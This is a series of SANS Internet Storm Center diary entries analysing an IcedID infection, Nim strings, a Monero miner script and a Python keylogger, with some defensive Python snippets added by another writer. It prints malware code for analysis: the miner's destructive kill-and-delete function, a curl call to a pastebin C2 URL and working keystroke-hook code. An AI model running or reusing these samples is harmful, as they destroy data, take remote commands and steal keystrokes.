SANS Internet Storm Center - Cooperative Cyber Security Monitor
March 24, 2021

ISC Stormcast For Wednesday, March 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7426, (Wed, Mar 24th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
March 24, 2021

Analysis from March 2021 Traffic Analysis Quiz, (Wed, Mar 24th)

Introduction

Yesterday's diary provided a packet capture (pcap) of approximately 20 and 1/2 hours of traffic from an infected Windows host, which included the initial infection.  It also provided malware and artifacts recovered from the infected computer.  That was presented as a traffic analysis quiz, and today's diary provides analysis of the activity.

This infection was from the recently updated version of IcedID (Bokbot) we started seeing in March 2021.  These types of infection are usually caused by malicious macros dressed in a Microsoft Office document like an Excel or Word file, such as this example from Friday 2021-03-19.


Shown above:  These documents are often as convincing as Spiderman is here.

Incident Report

Executive Summary:

On Tuesday 2021-03-16 at approximately 19:03 UTC, a Windows computer used by Maynard Constantino was infected with IcedID (Bokbot) malware.

Victim Details:

  • IP address: 172.16.4.213
  • MAC address: 34:64:a9:0e:b6:15
  • Host name: DESKTOP-BZQ15T8
  • User account name: maynard.constantino

Indicators of Compromise (IOCs):

Infection traffic:

  • 188.127.235[.]244 port 80 - 188.127.235[.]244 - GET /44271.7938611111.dat
  • 185.82.217[.]213 port 80 - 185.82.217[.]213 - GET /44271.7938611111.dat
  • port 443 (HTTPS traffic) - aws.amazon.com - GET /   (not inherently malicious)
  • 178.128.243[.]14 port 80 - 630mordorebiter[.]website - GET /
  • 165.227.28[.]47 port 443 - iporumuski[.]fun - HTTPS traffic
  • 165.227.28[.]47 port 443 - agitopinaholop[.]uno - HTTPS traffic
  • 165.227.28[.]47 port 443 - dedupomoshi[.]space - HTTPS traffic
  • 178.128.156[.]142 port 443 - mazaksaedr23[.]space - HTTPS traffic
  • 178.128.156[.]142 port 443 - kledoapkd[.]website - HTTPS traffic
  • 178.128.156[.]142 port 443 - lapoedjkeo[.]top - HTTPS traffic
  • 178.128.156[.]142 port 443 - kawepotriv[.]space - HTTPS traffic

List of files recovered from the infected user's home directory:

  • Kiod.hod
  • Kiod.hod2
  • AppData/Local/{10D90F27-F2E2-6218-7102-7745CA868DA0}/Embiteci.dll
  • AppData/Local/Temp/warfare_32.tmp
  • AppData/Roaming/CoverReplace/license.dat

Scheduled task recovered from infected Windows host:

rundll32.exe "C:\Users\maynard.constantino\AppData\Local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll",update /i:"CoverReplace\license.dat"

Details on files extracted from the pcap:

SHA256 hash: 4f667f4267b2a1e90029ec3e66de84f0131e573087d4a0f50e4c9b5b9e0a8173

  • File size: 44,544 bytes
  • File location: hxxp://188.127.235[.]244/44271.7938611111.dat
  • File location: hxxp://185.82.217[.]213/44271.7938611111.dat
  • File location: C:\Users\maynard.constantino\Kiod.hod
  • File location: C:\Users\maynard.constantino\Kiod.hod2
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

SHA256 hash: 91cf231431ef2cc4defc4f1ad3d149c665acc317c4a89e0188f32df259b63cef

  • File size: 377,579 bytes
  • File location: hxxp://630mordorebiter[.]website
  • File type:  gzip compressed data, was "update_2533051401.msi", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1397480
  • Note: This is an encrypted binary masquerading as a gzip file. It's not malicious on its own.

Details on files recovered from the infected Windows host:

SHA256 hash: 523bbb839a8c0524c0f372680e6abad3b9158fafa68865381fbd1380b7b934b9

  • File size: 36,352 bytes
  • File location: C:\Users\maynard.constantino\AppData\local\Temp\warfare_32.tmp
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
  • Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat"

SHA256 hash: 47d084aab92ee591fe180613fda9ffd132b15db9b09be41ab046260cda311dc0

  • File size: 36,352 bytes
  • File location: C:\Users\maynard.constantino\AppData\local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
  • Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat"

SHA256 hash: 45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865

  • File size: 341,002 bytes
  • File location: C:\Users\maynard.constantino\AppData\Roaming\CoverReplace\license.dat
  • File type: data
  • Note: This data binary is used by the above two DLL files

Analysis

The image below shows traffic from the pcap filtered in Wireshark to focus on the initial infection and C2 traffic.


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 2).

Of note, several hours after the infection, we started seeing different domains and IP addresses for the IcedID command and control (C2) traffic, as shown below.


Shown above:  C2 domains and IP address for the IcedID infection change near the end of the pcap.

Using Wireshark's Export HTTP Objects function, you can export the initial malware DLL and the fake gzip file used by IcedID's new "gziploader" technique to infect the host.  There are two copies of each file in the pcap.  See the image below for details.


Shown above:  Exporting initial DLL and fake gzip file from the pcap.

Perhaps the most easily identifiable characteristic of recent IcedID infections is the license.dat file referenced in the scheduled task.  This binary data file is used by both the initial IcedID DLL and the persistent one, and it is what the scheduled task hands to the DLL each time it runs, which is how the infection is kept persistent.


Shown above:  Action from the scheduled task, where rundll32.exe uses license.dat when running the persistent IcedID DLL.
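As an added example (my code, not part of Brad's diary or the linked repository), the following Python snippet turns the two most recognizable artifacts above into a check a defender can run over scheduled-task actions and proxy logs: the rundll32 "...dll",update /i:"...license.dat" task action quoted above, and the defanged C2 domains from the IOC list. The task action is the one recovered from the host; the proxy log lines are constructed for the example and are not from the pcap.

```python
import re

# Defanged C2 domains copied from the incident report above.
IOC_DOMAINS = [
    "630mordorebiter[.]website", "iporumuski[.]fun", "agitopinaholop[.]uno",
    "dedupomoshi[.]space", "mazaksaedr23[.]space", "kledoapkd[.]website",
    "lapoedjkeo[.]top", "kawepotriv[.]space",
]

# Scheduled task action recovered from the infected host (quoted above).
SAMPLE_TASK = (r'rundll32.exe "C:\Users\maynard.constantino\AppData\Local'
               r'\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll",update /i:"CoverReplace\license.dat"')

# Constructed proxy log lines (not from the pcap): "time client method url status".
SAMPLE_LOG = [
    "2021-03-16T19:02:55Z 172.16.4.213 GET https://aws.amazon.com/ 200",
    "2021-03-16T19:03:10Z 172.16.4.213 GET http://630mordorebiter.website/ 200",
    "2021-03-16T23:41:02Z 172.16.4.213 CONNECT kawepotriv.space:443 200",
]

# Persistence pattern: rundll32 loading a DLL, calling its "update" export and
# passing /i:"...license.dat" as the argument.
TASK_PATTERN = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+\.dll)"?\s*,\s*update\s+/i:"?(?P<arg>[^"]*license\.dat)"?',
    re.IGNORECASE,
)


def refang(indicator: str) -> str:
    """Turn a defanged indicator (x[.]y, hxxp://) back into plain form for matching."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def classify_task_action(action: str):
    """Return (dll_path, license_argument) when the task action matches the
    IcedID persistence pattern, or None for anything else."""
    m = TASK_PATTERN.search(action)
    if m is None:
        return None
    return m.group("dll"), m.group("arg")


def find_ioc_hits(log_lines, domains=IOC_DOMAINS):
    """Return [(line_number, defanged_domain)] for log lines mentioning a C2 domain."""
    plain = {refang(d).lower(): d for d in domains}
    hits = []
    for number, line in enumerate(log_lines, 1):
        lowered = line.lower()
        for host, defanged in plain.items():
            if host in lowered:
                hits.append((number, defanged))
    return hits


if __name__ == "__main__":
    print("task:", classify_task_action(SAMPLE_TASK))
    print("benign:", classify_task_action('rundll32.exe shell32.dll,Control_RunDLL desk.cpl'))
    for number, domain in find_ioc_hits(SAMPLE_LOG):
        print(f"line {number}: {domain}")
```

The task pattern is deliberately loose about quoting and whitespace, since the same action shows up slightly differently in Task Scheduler XML, Sysmon process-creation events and Autoruns output; the "update" export name and the license.dat argument are the parts that carry the signal.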

Final Words

This "gziploader" technique used by IcedID is fairly new, so some people in the infosec community might not be fully aware of it yet.  However, post-infection activity remains noticeably similar to what we've seen with IcedID malware in the past few months before the update.

A zip archive with a pcap of the infection traffic is available in this Github repository, which also contains malware and artifacts from the infected computer.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

March 23, 2021

The 2021 SANS Security Awareness Report is out. Learn data-driven lessons about how organizations around the world are effectively managing their human risk https://www.sans.org/security-awareness-training/sareport-2021, (Tue, Mar 23rd)

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

March 23, 2021

ISC Stormcast For Tuesday, March 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7424, (Tue, Mar 23rd)

March 23, 2021

March 2021 Traffic Analysis Quiz, (Tue, Mar 23rd)

Introduction

Today's diary is a new traffic analysis quiz.  For this quiz, I ask participants to write an incident report that identifies the affected Windows host and user account.

If possible, try to identify the malware family associated with this infection.  But there are many different types of malware, and they're constantly evolving and multiplying, so don't worry if you don't recognize the malware family.


Shown above:  So much malware out there.

The packet capture (pcap) for today's traffic analysis quiz is contained in a zip archive hosted at this Github repository.  The repository also contains another zip archive with malware and artifacts recovered from the infected Windows host.  Be very careful with the malware and artifacts zip.  If you don't know what you're doing, do not download the malware and artifacts.  I also recommend participants do this exercise in a non-Windows environment, if possible.

Unlike my previous traffic analysis quizzes, this quiz does not include any alerts on the network traffic.


Shown above:  Pcap for this traffic analysis quiz opened in Wireshark.

Requirements

This type of analysis requires Wireshark.  Wireshark is my tool of choice to review pcaps of infection traffic.  However, default settings for Wireshark are not optimized for web-based malware traffic.  That's why I encourage people to customize Wireshark after installing it.  To help, I've written a series of tutorials.  The ones most helpful for this quiz are:

I always recommend participants use a non-Windows environment like BSD, Linux, or macOS.  Why?  Because most pcaps in these traffic analysis quizzes contain traffic with Windows-based malware.  If you're using a Windows host to review such pcaps, your antivirus (or Windows Defender) may delete or alter the pcap.  Worst case?  If you extract malware from a pcap and accidentally run it, you might infect your Windows computer.

In this case, I've also included a zip archive that contains malware and artifacts retrieved from the infected Windows host.  Unless you are a skilled malware analyst, you should avoid examining the contents of that particular zip archive on a Windows computer, because it's Windows-based malware.

Active Directory (AD) Environment

The infected Windows host is part of an AD environment, so the pcap contains information about the Windows user account. The user account is formatted as firstname.lastname.  The AD environment characteristics are:

  • LAN segment range: 172.16.4.0/24 (172.16.4.0 through 172.16.4.255)
  • Domain: baritonetv.com
  • Domain Controller: 172.16.4.4 - BaritoneTV-DC
  • LAN segment gateway: 172.16.4.1
  • LAN segment broadcast address: 172.16.4.255

Final Words

Again, the zip archive with a pcap of the traffic for this exercise is available in this Github repository.  Analysis of this infection will be posted in tomorrow's ISC diary.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

March 22, 2021

Nim Strings, (Mon, Mar 22nd)

On Tuesday's Stormcast, Johannes talked about malware written in the Nim Programming language.

Internally, strings in the Nim programming language are stored inside a structure (STRING_LITERAL) that consists of 2 integers followed by the string.

Both integers represent the length of the string, although the second integer has one bit set to indicate it is a string literal.

Here is an example of a program I wrote and compiled to a 32-bit PE file:

In red is the string itself (17 bytes long, 0x11). Green is the first integer: the length of the string (0x00000011) encoded as a little-endian 32-bit integer (shown as bytes 11 00 00 00). Yellow is the second integer: the length of the string with the 3rd most-significant bit set (0x00000011 + 0x40000000 = 0x40000011), again encoded as a little-endian 32-bit integer (shown as bytes 11 00 00 40).

I wrote a Python script to extract these strings. It's beta: I still have to decide if and how to integrate this into my strings.py tool.

Unlike the classic tool strings, this tool will also extract strings that contain non-printable characters.
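As an added example (my code, not Didier's beta script), here is an extractor built directly from the layout described above: two little-endian integers, both equal to the string length, the second with the 3rd most-significant bit set, followed by the string bytes. It returns the bytes verbatim, so strings with non-printable characters come out too. The 64-bit variant (flag at bit 62) is a generalization assumed here, not something the diary shows; the sample image fragment is constructed for the example.

```python
import struct


def nim_strlit_flag(bits: int) -> int:
    """Flag bit in the second length field: 3rd most-significant bit of an integer
    of the given width, 0x40000000 for the 32-bit build discussed above.
    The 64-bit case (1 << 62) is an assumed generalization."""
    return 1 << (bits - 2)


def extract_nim_strings(data: bytes, bits: int = 32, min_len: int = 1):
    """Return [(offset, raw_bytes)] for every STRING_LITERAL candidate in `data`.

    The offset is that of the first length integer. Bytes are returned verbatim,
    so, unlike the classic strings tool, non-printable content is kept.
    """
    width = bits // 8
    fmt = "<I" if bits == 32 else "<Q"
    flag = nim_strlit_flag(bits)
    header = 2 * width
    last = len(data) - header          # last offset where both integers still fit
    found = []
    i = 0
    while i <= last:
        length = struct.unpack_from(fmt, data, i)[0]
        # The string body must fit inside the buffer after the two integers.
        if min_len <= length <= last - i:
            second = struct.unpack_from(fmt, data, i + width)[0]
            if second == (length | flag):
                start = i + header
                found.append((i, data[start:start + length]))
                i = start + length     # skip past the body and keep scanning
                continue
        i += 1
    return found


def build_sample() -> bytes:
    """Constructed 32-bit image fragment: filler bytes around two literals, one
    printable and one containing a tab and a 0x01 byte. Not taken from a real binary."""
    def literal(s: bytes) -> bytes:
        return struct.pack("<II", len(s), len(s) | nim_strlit_flag(32)) + s + b"\x00"
    return (b"\x90" * 5 + literal(b"Hello, Nim World!")
            + b"\xcc\xcc" + literal(b"tab\there\x01") + b"\x00" * 4)


if __name__ == "__main__":
    for offset, raw in extract_nim_strings(build_sample()):
        print(f"0x{offset:08x} len={len(raw):3d} {raw!r}")
```

Scanning every byte offset is deliberately simple; on a multi-megabyte PE it takes a few seconds in CPython, which is acceptable for triage. Requiring the second integer to equal the first with exactly the flag bit set is what keeps false positives low, since a random pair of 32-bit values rarely satisfies that relation.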


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

March 22, 2021

ISC Stormcast For Monday, March 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7422, (Mon, Mar 22nd)

March 21, 2021

Video: Finding Metasploit & Cobalt Strike URLs, (Sun, Mar 21st)

I received a couple of questions about my diary entry "Finding Metasploit & Cobalt Strike URLs", so I made a video that shows the method and explains the checksum calculation in detail.

I don't use this method to go hunting (in proxy logs, for example), as the checksum has low entropy and is thus prone to collisions/false positives. But I do use it when I suspect the presence of Metasploit or Cobalt Strike traffic.

Cobalt Strike beacons often use HTTPS, but the URLs I talked about in my diary entry are not the ones used by the beacon itself. They are the URLs of the staging shellcode that precedes the beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

March 20, 2021

YARA Pre-release v4.1.0, (Sat, Mar 20th)

There's a new version of YARA on GitHub, a pre-release for version 4.1.0.

We can expect the actual version 4.1.0 soon.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

March 19, 2021

Pastebin.com Used As a Simple C2 Channel, (Fri, Mar 19th)

With the growing threat of ransomware attacks, there are other malicious activities that get less attention today but remain active. Think about crypto-miners. Yes, attackers continue to mine Monero on compromised systems. I spotted an interesting shell script that installs and runs a crypto-miner (SHA256:00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2[1]).

The script looks to be a classic one but there are some interesting behaviours that I'd like to share.

Before launching the miner, such scripts try to get rid of previously installed competing tools. I already covered this in a previous diary[2], but how do they behave today? The script implements a function kills() that searches for existing miners and kills them. But it goes one step further: it also checks for established connections to specific ports or IP addresses!

function kills() {
    pkill -f sourplum
    pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
    rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
    rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
    rm -rf /tmp/*index_bak*
    rm -rf /tmp/*httpd.conf*
    rm -rf /tmp/*httpd.conf
    rm -rf /tmp/a7b104c270
    ps auxf|grep -v grep|grep "mine[.]moneropool[.]com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash[.]com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum[.]f2pool[.]com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
    pkill -f biosetjenkins
    pkill -f AnXqV.yam
    pkill -f xmrigDaemon
    pkill -f xmrigMiner
    pkill -f xmrig
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f bashx
    pkill -f bashg
    pkill -f bashe
    pkill -f bashf
    pkill -f bashh
    pkill -f XbashY
    pkill -f libapache
    pkill -f qW3xT.2
    pkill -f /usr/bin/.sshd
    pkill -f sustes
    pkill -f Xbash
    rm -rf /var/tmp/j*
    rm -rf /tmp/j*
    rm -rf /var/tmp/java
    rm -rf /tmp/java
    rm -rf /var/tmp/java2
    rm -rf /tmp/java2
    rm -rf /var/tmp/java*
    rm -rf /tmp/java*
    rm -rf /tmp/httpd.conf
    rm -rf /tmp/conn
    rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
    rm -rf /tmp/conns
    rm -f /tmp/irq.sh
    rm -f /tmp/irqbalanc1
    rm -f /tmp/irq
    rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
    rm -rf /tmp/.systemd-private-*
    chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
    chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
    rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
    netstat -anp | grep 69[.]28[.]55[.]86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep 185[.]71[.]65[.]238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep 140[.]82[.]52[.]87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
    if [ ${p} -eq 0 ];then
        netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
        ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9
    fi
}

This function is a perfect candidate to be rewritten from a defender's point of view and used to detect a potential miner running on your computers!
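Taking that suggestion literally, here is an added Python example (my code, not from the diary or the malware) that reuses the indicators from kills() the other way round: it reads ps and netstat output and reports, instead of killing, anything that matches a miner name, a pool hostname, a pool port, or the script's own 90% CPU heuristic. The two text samples are constructed for the example in ps auxww and netstat -anp layout; on a live host you would feed it the real command output.

```python
import re

# Indicator strings lifted from the kills() function above: the process names
# and pool hostnames it pkills or greps for, and the pool ports it checks in netstat.
MINER_PROCESS_RE = re.compile(
    r"xmrig|minerd|minergate|kworkerds|cryptonight|crypto-pool|moneropool|"
    r"monerohash|xmrpool|f2pool|stratum|sustes|Xbash|hashfish"
)
MINER_PORTS = {3333, 4444, 5555, 6666, 7777, 3347, 14444, 14433, 13531}
CPU_THRESHOLD = 90.0   # the script's last-resort heuristic: kill anything above 90% CPU

# Constructed samples (not from a real host) in `ps auxww` and `netstat -anp` layout.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 169000 11000 ? Ss 10:00 0:01 /sbin/init
www 2345 97.5 1.2 512000 40000 ? Sl 10:05 5:12 /tmp/kworkerds
www 2346 1.0 0.5 300000 9000 ? S 10:05 0:02 xmrig -o xmr.crypto-pool.fr:3333 -u wallet
user 2400 0.2 0.1 20000 4000 pts/0 Ss 10:10 0:00 -bash
user 2401 0.0 0.0 8000 1000 pts/0 S+ 10:11 0:00 grep xmrig
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 10.0.0.5:41822 198.51.100.7:3333 ESTABLISHED 2346/xmrig
tcp 0 0 10.0.0.5:22 10.0.0.9:53322 ESTABLISHED 1200/sshd
tcp 0 0 10.0.0.5:40000 203.0.113.7:443 ESTABLISHED 2345/kworkerds
"""


def parse_ps(text):
    """Return [(pid, cpu_percent, command)] from ps aux-style output, header skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split(None, 10)        # the COMMAND column keeps its own spaces
        if len(fields) < 11:
            continue
        rows.append((int(fields[1]), float(fields[2]), fields[10]))
    return rows


def suspicious_processes(ps_text):
    """Return {pid: [reasons]} for processes that look like a miner."""
    findings = {}
    for pid, cpu, command in parse_ps(ps_text):
        if command.startswith("grep "):      # ignore the operator's own grep, as the script does
            continue
        reasons = []
        if MINER_PROCESS_RE.search(command):
            reasons.append("miner indicator in command line")
        if cpu >= CPU_THRESHOLD:
            reasons.append(f"cpu {cpu}% >= {CPU_THRESHOLD}%")
        if reasons:
            findings[pid] = reasons
    return findings


def pool_connections(netstat_text):
    """Return [(pid, program, remote_address)] for connections to a known pool port."""
    hits = []
    for line in netstat_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 7:
            continue
        remote = fields[4]
        port = remote.rsplit(":", 1)[-1]
        if port.isdigit() and int(port) in MINER_PORTS:
            pid, _, program = fields[6].partition("/")   # "-" when not permitted to see the owner
            if pid.isdigit():
                hits.append((int(pid), program, remote))
    return hits


if __name__ == "__main__":
    for pid, reasons in suspicious_processes(SAMPLE_PS).items():
        print(f"pid {pid}: {', '.join(reasons)}")
    for pid, program, remote in pool_connections(SAMPLE_NETSTAT):
        print(f"pid {pid} ({program}) -> {remote}")
```

The CPU rule on its own is noisy (builds, backups and databases also sit at 90%), which is why it is reported as a separate reason rather than merged with the name match; a process that trips both is the one to look at first.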

The second interesting point is the use of pastebin.com not only to download malicious payloads but also as a very simple C2 communication channel. Did you know that, when you create a pastie, you can edit it later?

The script (executed from a cron job) grabs the content of a pastie and, based on the content, behaves in different ways:

update=$( curl -fsSL --connect-timeout 120 hxxps://pastebin[.]com/raw/SSCy7mY7 )
if [ ${update}x = "update"x ];then
    echocron
else
    ...

The current pastie content:

remnux@remnux:/MalwareZoo/20210319$ curl hxxps://pastebin[.]com/raw/SSCy7mY7
noupdate

Simple but effective!

[1] https://www.virustotal.com/gui/file/00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2/detection
[2] https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

March 19, 2021

ISC Stormcast For Friday, March 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7420, (Fri, Mar 19th)

March 18, 2021

Simple Python Keylogger , (Thu, Mar 18th)

A keylogger is one of the core features implemented by many malware families to exfiltrate interesting data and learn about the victim. Besides the fact that captured keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by looking at the text typed on the keyboard, the attacker can profile the target and estimate whether it's a juicy one or not.

To follow up on my diary from yesterday[1]: Microsoft Windows provides API calls such as GetKeyState() and GetAsyncKeyState() that help determine whether a particular key is pressed[2], which is all a keylogger needs. But can attackers implement a keylogger in other languages?

In 2019, I wrote a diary about a keylogger in PowerShell[3]. Seeing that Python is becoming more and more popular in the Windows ecosystem, I searched for some samples. I found one that was published as a PoC[4] six years ago already(!) but is still used in the wild today. It was submitted to VT again a few weeks ago (SHA256:fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41[5]) and still has a very low detection rate (only 3/59).

The implementation in Python is extremely easy thanks to the pyHook module:

import pyHook, pythoncom

data=''

def GetKeyPressedAndSendIt(event):
    global data
    if event.Ascii==13:
        keys='<ENTER>'
    elif event.Ascii==8:
        keys='<BACK SPACE>'
    elif event.Ascii==9:
        keys='<TAB>'
    else:
        keys=chr(event.Ascii)
    data=data+keys

hm = pyHook.HookManager()
hm.KeyDown = GetKeyPressedAndSendIt
hm.HookKeyboard()
pythoncom.PumpMessages()

I performed a quick retro hunt on VT to search for the same kind of script and found only 9 occurrences:

Hash                                                              Type    Score  Upload Time
ebb80bf4d9768ed7ee9ade739304453ac3474bfdbf06d8a414563aa1bf19592f  PE      3/68   2021-02-21 02:51:42 UTC
675757ca9bc6b3be10913e5a4ee43bea371ad8f826c5a25d4c0e38e90bfb1f25  PE      2/70   2021-02-17 04:48:20 UTC
79b53c72eeb936161ed8069da5e6ccddd42cc993b90ac67fb5262abc194e8797  Script  1/59   2021-02-15 11:43:15 UTC
a518235828977df57f0c3442390729affce92ed4613f8fb3cdda48f06d8712b9  Script  0/59   2021-02-02 02:07:36 UTC
cd8e126b6305cd97486877bbe1db8e3dfe2653a63d451484399f12ebff339ed3  Script  12/58  2021-02-08 22:35:34 UTC
f3d38383b0bf68204bd755ce80110915858b48c860bc7b76d91ec1c7dcb07058  Script  10/58  2021-01-22 22:22:23 UTC
395d51c3fdb2f8281cf0a9d9815f256d5f50d6eddd20d36d9eb33938be921d97  PE      13/70  2021-01-17 06:30:19 UTC
9866864b511576fe2421b469d163d8d942c29a7651c5f7f505750c70734b1183  Script  0/56   2021-01-15 14:44:05 UTC
365b45370d4db7600195c126d700de6e31d4d4084d14ff8e12a4371d84c89c85  Script  1/60   2020-12-21 00:34:00 UTC

As you can see, the peak of submitted samples occurred between mid-January and mid-February.

[1] https://isc.sans.edu/forums/diary/Defenders+Know+Your+Operating+System+Like+Attackers+Do/27212/
[2] https://gist.github.com/aktau/11057438
[3] https://isc.sans.edu/forums/diary/Simple+Powershell+Keyloggers+are+Back/24676
[4] https://github.com/HacKeD0x90/PythonKeyLogger
[5] https://www.virustotal.com/gui/file/fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

March 18, 2021

ISC Stormcast For Thursday, March 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7418, (Thu, Mar 18th)

March 17, 2021

Defenders, Know Your Operating System Like Attackers Do!, (Wed, Mar 17th)

Not a technical diary today but more a reflection… When I’m teaching FOR610[1], I always remind students to “RTFM” or "Read the F… Manual". I mean: do not hesitate to look at the Microsoft documentation when you meet an API call for the first time or are not sure about its expected parameters.

